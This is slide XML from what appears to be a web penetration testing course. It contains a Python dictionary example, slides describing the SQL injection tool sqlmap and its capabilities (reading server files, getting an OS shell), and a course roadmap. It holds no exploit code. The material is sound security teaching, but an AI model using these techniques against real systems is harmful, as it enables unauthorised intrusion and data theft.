              <a:t>Dictionaries can store name/value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>knights = {"Lancelot":"the Brave", "Galahad":"the Pure",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>           "Robin":"Not-Quite-So-Brave-As-Sir-Lancelot"}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print( knights["Robin"] )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1039066" y="2326702"/>
            <a:ext cx="5852515" cy="113671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Tx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2515327731"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148483" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1599883"/>
            <a:ext cx="4946650" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sqlmap is a Python application that performs SQL injection discovery and exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://sqlmap.sourceforge.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is also integrated into w3af</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Its main focus is providing a platform that simplifies SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is one of the best free tools for this type of attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is due to the lower failure rate in successfully exploiting a flaw</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148484"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98988" y="2438400"/>
            <a:ext cx="4468812" cy="2819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8485" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3116565">
            <a:off x="8162925" y="3117850"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148486" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-6340265">
            <a:off x="6748463" y="2112963"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr 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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sqlmap Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149507" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1474470"/>
            <a:ext cx="8229600" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sqlmap has many powerful features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It supports both types of SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Normal or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>in-band</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>in-band</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> because the results are typically visible in the HTML response from the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Blind SQL injection, in which database error messages and output of queries are not shown in response messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can also use Google searches to find SQL errors indexed and cached by Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can import target URLs from Burp or WebScarab tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Provides a variety of useful, pre-built attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Read files from the server, encoding files for transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Provides an OS shell, giving access to the database server</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
